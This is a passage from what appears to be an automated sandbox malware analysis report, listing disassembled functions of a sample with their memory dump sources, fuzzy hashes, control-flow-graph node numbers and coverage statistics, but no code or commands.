                                                                        • Instruction ID: e61ed8bd828f40b9af7a0834f4d9565cf40d4dbffa93aed3f2cc293850cb66e8
                                                                        • Opcode Fuzzy Hash: 5effd9b7679ec0e017babf55c246c2d7b7b71257d4cd832ccf679e441052773c
                                                                        • Instruction Fuzzy Hash: 8E212571504304EFDB15DF64D880B26BBB9FB84314F20C96DEA094F246D336D407CA62
                                                                        Function 015FD220 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7dced32d7d4f906ce6df4a494168b63d574a5785792adb8375f9747adc13ac3a
                                                                        • Instruction ID: b12e7fecbbb92eec5dcd5cba2c5d07064b6f997bf5949330ef3b6fb26b88c6bd
                                                                        • Opcode Fuzzy Hash: 7dced32d7d4f906ce6df4a494168b63d574a5785792adb8375f9747adc13ac3a
                                                                        • Instruction Fuzzy Hash: 65214C75504304DFDB01DF94D5C0B29BBB1FB84324F20C96DDA094F246C336D846CAA1
                                                                        Function 015FD006 Relevance: .1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f39f4b0bfcb943f53f2944c868d74a1a03dec9e735ef700662b29ad2cc45346
                                                                        • Instruction ID: 5c0e42b96c0325fdb979be74ee1780c940e6b4d936938bc8664587f251205c11
                                                                        • Opcode Fuzzy Hash: 6f39f4b0bfcb943f53f2944c868d74a1a03dec9e735ef700662b29ad2cc45346
                                                                        • Instruction Fuzzy Hash: A3218E755093809FCB03CF24D990715BF71FB46214F29C5EAD9498F6A7C33A980ACB62
                                                                        Function 015ED4BF Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459355334.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15ed000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction ID: a76463e43043d75f2156478ebe20023d946f3f5854160d3108af38d26e822128
                                                                        • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction Fuzzy Hash: F4119D76904280DFCB16CF54D9C4B1ABFB1FB84218F24C6AAD8490F656C33AD456CBA2
                                                                        Function 015FD21B Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459417245.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_15fd000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: c943788672e78495d4fb8b84acb4cbf006f3252fc6aac91da76f0cb097d6ac52
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: D211A979504284DFCB02CF54D584B19BFB1FB84224F24C6AED9494F656C33AD84ACBA2

                                                                        Non-executed Functions

                                                                        Function 07A1D858 Relevance: .4, Instructions: 355COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8460a0beec71fd4159067f4cc993aa5d2d172fe2a2c2fe68797071589d478abb
                                                                        • Instruction ID: 24f46a55a40d4431364591b3282499315ad9f00540e61b067e3136cc8c26520d
                                                                        • Opcode Fuzzy Hash: 8460a0beec71fd4159067f4cc993aa5d2d172fe2a2c2fe68797071589d478abb
                                                                        • Instruction Fuzzy Hash: 39D1BCB17006018FEB29EB75C850BAA77F6AF89700F14846DD16ADB790DB35E901CB61
                                                                        Function 07A157A8 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b99a58c5075490e5bc0690b0a937757510c2a7a718edf6308a1ef877f6be45c
                                                                        • Instruction ID: c2903603424504733490a29e9a665a06437200f14909c950d60ce22ccc276523
                                                                        • Opcode Fuzzy Hash: 3b99a58c5075490e5bc0690b0a937757510c2a7a718edf6308a1ef877f6be45c
                                                                        • Instruction Fuzzy Hash: 74E1EBB4E002598FDB24CFA9C5809AEBBF2FF89305F248169D854AB355D734AD41CFA1
                                                                        Function 07A14F38 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df3e0144a1b03d3b76feac78ca4edfff4bc1811db918761a041131f30f1dc988
                                                                        • Instruction ID: 3a08710e6fbd2ef356b44fddf58b917808bc442faaf951f6d775b0dc636f2587
                                                                        • Opcode Fuzzy Hash: df3e0144a1b03d3b76feac78ca4edfff4bc1811db918761a041131f30f1dc988
                                                                        • Instruction Fuzzy Hash: 2FE1C7B4E002598FDB24DFA9C5809AEBBF2FF89305F248169D814AB355D735AD41CFA0
                                                                        Function 07A17448 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 33c72c34229869db4a4808febd5a0b27852b31afa33f1690149f21ba0430374a
                                                                        • Instruction ID: 90ccd8c95b51116f646e0e09ee07881d90d88dc3ee8c60c4a86ffc6d862d12eb
                                                                        • Opcode Fuzzy Hash: 33c72c34229869db4a4808febd5a0b27852b31afa33f1690149f21ba0430374a
                                                                        • Instruction Fuzzy Hash: A0E1EAB4E002598FDB24CFA9C580AAEBBF2FF89305F248169D814A7355D735AD41CFA1
                                                                        Function 07A15370 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed8c1e81a55b15e99359a8dc7d6e6911e046efbecb41fb453a56b910ede8c882
                                                                        • Instruction ID: 37aad2e664e4a1b25531f70ad1cc83b13523a331da7c51628d2c26f15f867774
                                                                        • Opcode Fuzzy Hash: ed8c1e81a55b15e99359a8dc7d6e6911e046efbecb41fb453a56b910ede8c882
                                                                        • Instruction Fuzzy Hash: EBE1D8B4E002598FDB24CFA9C5809AEBBF2FF89305F248169D815AB355D734AD41CFA1
                                                                        Function 07A16A48 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4cbdd16590d002bfe4349e7c7e350929e7ef2a5ae8f9b5ec3334a0f4d54366c6
                                                                        • Instruction ID: 70c9643a41c735fc752a3f74544b4eacef60cc29412ab3e63c9b8187e6088288
                                                                        • Opcode Fuzzy Hash: 4cbdd16590d002bfe4349e7c7e350929e7ef2a5ae8f9b5ec3334a0f4d54366c6
                                                                        • Instruction Fuzzy Hash: 66E1ECB4E002598FDB24DFA9C5809AEBBF2FF89305F248169D814A7355DB35AD41CF60
                                                                        Function 02DFDE24 Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11c00509d978e22ae2fcc5914081665c6b1f945eb6650859e7e605bc28a4a2f7
                                                                        • Instruction ID: 9442dea3b6692d91b424be09dd81cf336756c2bff89230ab5fbe03afd78aa5ef
                                                                        • Opcode Fuzzy Hash: 11c00509d978e22ae2fcc5914081665c6b1f945eb6650859e7e605bc28a4a2f7
                                                                        • Instruction Fuzzy Hash: ABA14A32A002098FCF15DFB5C84099EB7B3FF84304B1685AAE905AB3A5EB71ED55CB54

                                                                        Execution Graph

                                                                        Execution Coverage:8.1%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:17
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 24737 1790871 24738 179087c 24737->24738 24742 17908d8 24738->24742 24747 17908c8 24738->24747 24739 1790889 24743 17908fa 24742->24743 24752 1790ce8 24743->24752 24756 1790ce0 24743->24756 24746 179093e 24746->24739 24748 17908d0 24747->24748 24750 1790ce8 GetConsoleWindow 24748->24750 24751 1790ce0 GetConsoleWindow 24748->24751 24749 179093e 24749->24739 24750->24749 24751->24749 24753 1790d26 GetConsoleWindow 24752->24753 24755 1790d56 24753->24755 24755->24746 24757 1790ce4 GetConsoleWindow 24756->24757 24759 1790d56 24757->24759 24759->24746

                                                                        Executed Functions

                                                                        Function 071AE1B8 Relevance: .4, Instructions: 419COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1557 71ae1b8-71ae1d0 1559 71ae20a-71ae229 1557->1559 1560 71ae1d2-71ae1db 1557->1560 1561 71ae22c-71ae2ad 1560->1561 1562 71ae1dd-71ae1ed 1560->1562 1571 71ae2b3-71ae2bf 1561->1571 1572 71ae4c0-71ae4e4 1561->1572 1564 71ae1f5-71ae1f7 1562->1564 1566 71ae1f9-71ae1fe 1564->1566 1567 71ae201-71ae207 1564->1567 1567->1559 1573 71ae64f-71ae68a 1571->1573 1574 71ae2c5-71ae2dc call 71a6c00 1571->1574 1579 71ae4ea-71ae4ee 1572->1579 1580 71ae611-71ae615 1572->1580 1594 71ae68c-71ae6a3 1573->1594 1595 71ae6a4-71ae6bf 1573->1595 1574->1572 1583 71ae2e2-71ae326 1574->1583 1584 71ae5ac-71ae5b2 1579->1584 1585 71ae4f4-71ae4fa 1579->1585 1581 71ae643-71ae64c 1580->1581 1582 71ae617-71ae61b 1580->1582 1582->1581 1586 71ae61d-71ae63e 1582->1586 1609 71ae328-71ae334 call 71ab668 1583->1609 1610 71ae336 1583->1610 1587 71ae5b4-71ae5fa 1584->1587 1588 71ae605-71ae60e 1584->1588 1590 71ae4fc-71ae500 1585->1590 1591 71ae513-71ae59c 1585->1591 1586->1581 1600 71ae640 1586->1600 1587->1588 1590->1584 1592 71ae506-71ae50d 1590->1592 1591->1588 1631 71ae59e-71ae5aa 1591->1631 1592->1584 1592->1591 1600->1581 1614 71ae338-71ae348 1609->1614 1610->1614 1618 71ae34a-71ae351 1614->1618 1619 71ae387-71ae3cb 1614->1619 1621 71ae36b-71ae372 1618->1621 1622 71ae353-71ae369 1618->1622 1636 71ae3db 1619->1636 1637 71ae3cd-71ae3d9 call 71ab668 1619->1637 1624 71ae375-71ae377 1621->1624 1622->1624 1624->1619 1627 71ae379-71ae37d 1624->1627 1627->1619 1630 71ae37f-71ae382 1627->1630 1632 71ae4b6-71ae4ba 1630->1632 1631->1588 1632->1571 1632->1572 1639 71ae3dd-71ae3ed 1636->1639 1637->1639 1642 71ae3ef-71ae3f1 1639->1642 1643 71ae3f3-71ae3f9 1639->1643 1644 71ae401-71ae403 1642->1644 1643->1644 1645 71ae409-71ae40f 1644->1645 1646 71ae4b3 1644->1646 1647 71ae4a7-71ae4b0 1645->1647 1648 71ae415-71ae499 1645->1648 1646->1632 1648->1647 1657 71ae49b-71ae49e 1648->1657 1657->1647
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 298c5e3526deb62b81376c0670bd5ff233a6902edbf59b38efe7cc08e5c3c42d
                                                                        • Instruction ID: f4fa098ca8d149360c4f2405559037d73e4d92382a377fcfe916243063df5ac9
                                                                        • Opcode Fuzzy Hash: 298c5e3526deb62b81376c0670bd5ff233a6902edbf59b38efe7cc08e5c3c42d
                                                                        • Instruction Fuzzy Hash: 22F1A3B0A0030AAFDB15DF69D844A9EBBF2FF89710F148569E405EB2A1DB30DC45CB90
                                                                        Function 071AC298 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 817 71ac298-71ac2e0 call 71ac030 822 71ac2e2-71ac2e4 817->822 823 71ac2e6-71ac2ea 817->823 824 71ac2f0-71ac313 822->824 823->824 829 71ac31f-71ac32b 824->829 830 71ac315-71ac31a 824->830 835 71ac35e-71ac36a 829->835 836 71ac32d-71ac359 call 71ab930 829->836 831 71ac3fb-71ac401 830->831 833 71ac403 831->833 834 71ac407-71ac427 831->834 833->834 847 71ac429-71ac42e 834->847 848 71ac433-71ac448 834->848 840 71ac36c-71ac371 835->840 841 71ac376-71ac38a 835->841 836->831 840->831 852 71ac38c-71ac3ae 841->852 853 71ac3f6 841->853 851 71ac4d0-71ac4de 847->851 861 71ac4cb 848->861 862 71ac44e-71ac45e 848->862 857 71ac4e0-71ac4e4 851->857 858 71ac4f6-71ac502 851->858 874 71ac3b0-71ac3d2 852->874 875 71ac3d4-71ac3ed 852->875 853->831 987 71ac4e6 call 71acba0 857->987 988 71ac4e6 call 71acad0 857->988 989 71ac4e6 call 71acae0 857->989 866 71ac508-71ac524 858->866 867 71ac5e6-71ac61a 858->867 861->851 870 71ac472-71ac477 862->870 871 71ac460-71ac470 862->871 863 71ac4ec-71ac4ee 863->858 882 71ac5d2-71ac5e0 866->882 892 71ac61c-71ac630 867->892 893 71ac632-71ac634 867->893 870->851 871->870 878 71ac479-71ac489 871->878 874->853 874->875 875->853 894 71ac3ef-71ac3f4 875->894 890 71ac48b-71ac490 878->890 891 71ac492-71ac4a2 878->891 882->867 883 71ac529-71ac532 882->883 888 71ac538-71ac54b 883->888 889 71ac7f1-71ac818 883->889 888->889 897 71ac551-71ac563 888->897 907 71ac81e-71ac820 889->907 908 71ac8ac-71ac8fd 889->908 890->851 905 71ac4ab-71ac4bb 891->905 906 71ac4a4-71ac4a9 891->906 892->893 895 71ac636-71ac648 893->895 896 71ac664-71ac6a4 893->896 894->831 895->896 909 71ac64a-71ac65c 895->909 985 71ac6a6 call 71acedb 896->985 986 71ac6a6 call 71acee8 896->986 910 71ac5cf 897->910 911 71ac565-71ac571 897->911 921 71ac4bd-71ac4c2 905->921 922 71ac4c4-71ac4c9 905->922 906->851 907->908 913 71ac826-71ac828 907->913 947 71ac8ff-71ac90c 908->947 948 71ac90d-71ac917 908->948 909->896 910->882 911->889 916 71ac577-71ac5cc 911->916 913->908 914 71ac82e-71ac832 913->914 914->908 919 71ac834-71ac838 914->919 916->910 923 71ac84a-71ac88c call 71a71b8 919->923 924 71ac83a-71ac848 919->924 921->851 922->851 934 71ac894-71ac8a9 923->934 924->934 927 71ac6ac-71ac6c0 940 71ac6c2-71ac6d9 927->940 941 71ac707-71ac71e 927->941 956 71ac6db-71ac6e5 940->956 957 71ac6e7-71ac6ff call 71ab930 940->957 983 71ac720 call 71addd3 941->983 984 71ac720 call 71adde0 941->984 954 71ac919-71ac924 948->954 955 71ac926-71ac92c 948->955 952 71ac726-71ac754 966 71ac7a8-71ac7bf 952->966 967 71ac756-71ac76f 952->967 964 71ac92e-71ac974 954->964 955->964 956->957 957->941 972 71ac7c1-71ac7ca 966->972 973 71ac7e5-71ac7ee 966->973 975 71ac779-71ac7a5 967->975 976 71ac771 967->976 978 71ac7d3-71ac7dc 972->978 975->966 976->975 978->973 983->952 984->952 985->927 986->927 987->863 988->863 989->863
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: So
                                                                        • API String ID: 0-2829772482
                                                                        • Opcode ID: dddbb66fb31b5bdd537380a06cefc53e7aa9a85bc726edbfab01f59e4a453dfd
                                                                        • Instruction ID: 44120c27038fe22afdd29bb3a8d71830d7742b5ac8a0fe22e3c1cc5e4001c5f5
                                                                        • Opcode Fuzzy Hash: dddbb66fb31b5bdd537380a06cefc53e7aa9a85bc726edbfab01f59e4a453dfd
                                                                        • Instruction Fuzzy Hash: BD327FB87006059FDB15DF79C484A6ABBF2FF89700B1544A9E406DB3A2DB34EC45CBA1
                                                                        Function 01790CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 990 1790ce0-1790ce2 991 1790ce5-1790d54 GetConsoleWindow 990->991 992 1790ce4 990->992 995 1790d5d-1790d82 991->995 996 1790d56-1790d5c 991->996 992->991 996->995
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1599982240.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_1790000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0
                                                                        • Opcode ID: 52c9b431ba5cc370447b139bf75b2fa2a1efa1593bc0c7b082b4070aa55c58ee
                                                                        • Instruction ID: 57d7cf75adbe0e6fbc3ae72974fc862f2d7847372eb79c25f4bbb3c50007f9de
                                                                        • Opcode Fuzzy Hash: 52c9b431ba5cc370447b139bf75b2fa2a1efa1593bc0c7b082b4070aa55c58ee
                                                                        • Instruction Fuzzy Hash: F6114671C103488FDB24DFAAD8457EFFBF4AB49224F24881AD519A7250C7356545CB90
                                                                        Function 01790CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1000 1790ce8-1790d54 GetConsoleWindow 1003 1790d5d-1790d82 1000->1003 1004 1790d56-1790d5c 1000->1004 1004->1003
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1599982240.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_1790000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0
                                                                        • Opcode ID: a661eab0c2121a31f32dd9d548053b00e05a01494ea1710732b9817654521ab0
                                                                        • Instruction ID: f00dffe49809478b9731b80b2d70e1b584ba85fd835e5ac81f8bd3631c8f6a73
                                                                        • Opcode Fuzzy Hash: a661eab0c2121a31f32dd9d548053b00e05a01494ea1710732b9817654521ab0
                                                                        • Instruction Fuzzy Hash: C6114571D00349CFDB24DFAAD8457DFFBF8AB48220F24881AD419A7240CB79A544CFA1
                                                                        Function 071AC288 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1008 71ac288-71ac2e0 call 71ac030 1014 71ac2e2-71ac2e4 1008->1014 1015 71ac2e6-71ac2ea 1008->1015 1016 71ac2f0-71ac313 1014->1016 1015->1016 1021 71ac31f-71ac32b 1016->1021 1022 71ac315-71ac31a 1016->1022 1027 71ac35e-71ac36a 1021->1027 1028 71ac32d-71ac359 call 71ab930 1021->1028 1023 71ac3fb-71ac401 1022->1023 1025 71ac403 1023->1025 1026 71ac407-71ac427 1023->1026 1025->1026 1039 71ac429-71ac42e 1026->1039 1040 71ac433-71ac448 1026->1040 1032 71ac36c-71ac371 1027->1032 1033 71ac376-71ac38a 1027->1033 1028->1023 1032->1023 1044 71ac38c-71ac3ae 1033->1044 1045 71ac3f6 1033->1045 1043 71ac4d0-71ac4de 1039->1043 1053 71ac4cb 1040->1053 1054 71ac44e-71ac45e 1040->1054 1049 71ac4e0-71ac4e4 1043->1049 1050 71ac4f6-71ac502 1043->1050 1066 71ac3b0-71ac3d2 1044->1066 1067 71ac3d4-71ac3ed 1044->1067 1045->1023 1179 71ac4e6 call 71acba0 1049->1179 1180 71ac4e6 call 71acad0 1049->1180 1181 71ac4e6 call 71acae0 1049->1181 1058 71ac508-71ac524 1050->1058 1059 71ac5e6-71ac61a 1050->1059 1053->1043 1062 71ac472-71ac477 1054->1062 1063 71ac460-71ac470 1054->1063 1055 71ac4ec-71ac4ee 1055->1050 1074 71ac5d2-71ac5e0 1058->1074 1084 71ac61c-71ac630 1059->1084 1085 71ac632-71ac634 1059->1085 1062->1043 1063->1062 1070 71ac479-71ac489 1063->1070 1066->1045 1066->1067 1067->1045 1086 71ac3ef-71ac3f4 1067->1086 1082 71ac48b-71ac490 1070->1082 1083 71ac492-71ac4a2 1070->1083 1074->1059 1075 71ac529-71ac532 1074->1075 1080 71ac538-71ac54b 1075->1080 1081 71ac7f1-71ac818 1075->1081 1080->1081 1089 71ac551-71ac563 1080->1089 1099 71ac81e-71ac820 1081->1099 1100 71ac8ac-71ac8fd 1081->1100 1082->1043 1097 71ac4ab-71ac4bb 1083->1097 1098 71ac4a4-71ac4a9 1083->1098 1084->1085 1087 71ac636-71ac648 1085->1087 1088 71ac664-71ac690 1085->1088 1086->1023 1087->1088 1101 71ac64a-71ac65c 1087->1101 1109 71ac696-71ac6a4 1088->1109 1102 71ac5cf 1089->1102 1103 71ac565-71ac571 1089->1103 1113 71ac4bd-71ac4c2 1097->1113 1114 71ac4c4-71ac4c9 1097->1114 1098->1043 1099->1100 1105 71ac826-71ac828 1099->1105 1139 71ac8ff-71ac90c 1100->1139 1140 71ac90d-71ac917 1100->1140 1101->1088 1102->1074 1103->1081 1108 71ac577-71ac5cc 1103->1108 1105->1100 1106 71ac82e-71ac832 1105->1106 1106->1100 1111 71ac834-71ac838 1106->1111 1108->1102 1177 71ac6a6 call 71acedb 1109->1177 1178 71ac6a6 call 71acee8 1109->1178 1115 71ac84a-71ac88c call 71a71b8 1111->1115 1116 71ac83a-71ac848 1111->1116 1113->1043 1114->1043 1126 71ac894-71ac8a9 1115->1126 1116->1126 1119 71ac6ac-71ac6c0 1132 71ac6c2-71ac6d9 1119->1132 1133 71ac707-71ac70d 1119->1133 1148 71ac6db-71ac6e5 1132->1148 1149 71ac6e7-71ac6ff call 71ab930 1132->1149 1137 71ac715-71ac71e 1133->1137 1175 71ac720 call 71addd3 1137->1175 1176 71ac720 call 71adde0 1137->1176 1146 71ac919-71ac924 1140->1146 1147 71ac926-71ac92c 1140->1147 1144 71ac726-71ac754 1158 71ac7a8-71ac7bf 1144->1158 1159 71ac756-71ac76f 1144->1159 1156 71ac92e-71ac974 1146->1156 1147->1156 1148->1149 1149->1133 1164 71ac7c1-71ac7ca 1158->1164 1165 71ac7e5-71ac7ee 1158->1165 1167 71ac779-71ac7a5 1159->1167 1168 71ac771 1159->1168 1170 71ac7d3-71ac7dc 1164->1170 1167->1158 1168->1167 1170->1165 1175->1144 1176->1144 1177->1119 1178->1119 1179->1055 1180->1055 1181->1055
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: So
                                                                        • API String ID: 0-2829772482
                                                                        • Opcode ID: 158ebe793d86738a6c15f42c69fb8cef953cb6e04157f6921138f1e58eb7e784
                                                                        • Instruction ID: a1d32286da740ad8c68b92a274c7b1b5d2bf13bef558470e670a872758eb4051
                                                                        • Opcode Fuzzy Hash: 158ebe793d86738a6c15f42c69fb8cef953cb6e04157f6921138f1e58eb7e784
                                                                        • Instruction Fuzzy Hash: F6B12A787006058FCB15DF79C498AAABBF2FF89700B5540A9E446DB3A1DB34EC45CBA1
                                                                        Function 071ACAE0 Relevance: .2, Instructions: 210COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1923 71acae0-71acaf5 1924 71acafe-71acb0a 1923->1924 1925 71acaf7-71acafc 1923->1925 1925->1924 1926 71acb0b-71acb17 1925->1926 1927 71acb3a-71acb53 1926->1927 1928 71acb19-71acb1c 1926->1928 1936 71acb88-71acb92 1927->1936 1937 71acb55-71acb80 call 71aca08 1927->1937 1929 71acb1f-71acb24 1928->1929 1931 71acb93-71acbca 1929->1931 1932 71acb26-71acb38 1929->1932 1939 71accf8-71acd04 1931->1939 1940 71acbd0-71acc04 1931->1940 1932->1927 1932->1929 1937->1936 1948 71acc18 1940->1948 1949 71acc06-71acc16 1940->1949 1950 71acc1a-71acc1c 1948->1950 1949->1950 1951 71acc1e-71acc23 1950->1951 1952 71acc25-71acc38 call 71aca48 1950->1952 1954 71acc3b-71acc41 1951->1954 1952->1954 1956 71acc47-71acc58 1954->1956 1957 71accc5-71accdc 1954->1957 1960 71acc5a-71acc65 1956->1960 1961 71accbf-71accc3 1956->1961 1962 71accde-71acce3 1957->1962 1963 71acce5-71acce7 1957->1963 1967 71acc90-71acc9a call 71ab930 1960->1967 1968 71acc67-71acc7d 1960->1968 1961->1956 1961->1957 1964 71accee-71accf5 1962->1964 1963->1964 1965 71acce9 call 71acae0 1963->1965 1965->1964 1972 71acc9c-71accb3 1967->1972 1968->1967 1974 71acc7f-71acc8e 1968->1974 1972->1961 1976 71accb5-71accb8 1972->1976 1974->1972 1976->1961
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1625571688.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_71a0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9bb51a200fe23428b2170e4ad0e18562a163674c88db0960116c139a3854158
                                                                        • Instruction ID: ce17f88b0de8e30c82a98e9f1fdf959fd3f025684922cace03e25d11db3e6cb1
                                                                        • Opcode Fuzzy Hash: d9bb51a200fe23428b2170e4ad0e18562a163674c88db0960116c139a3854158
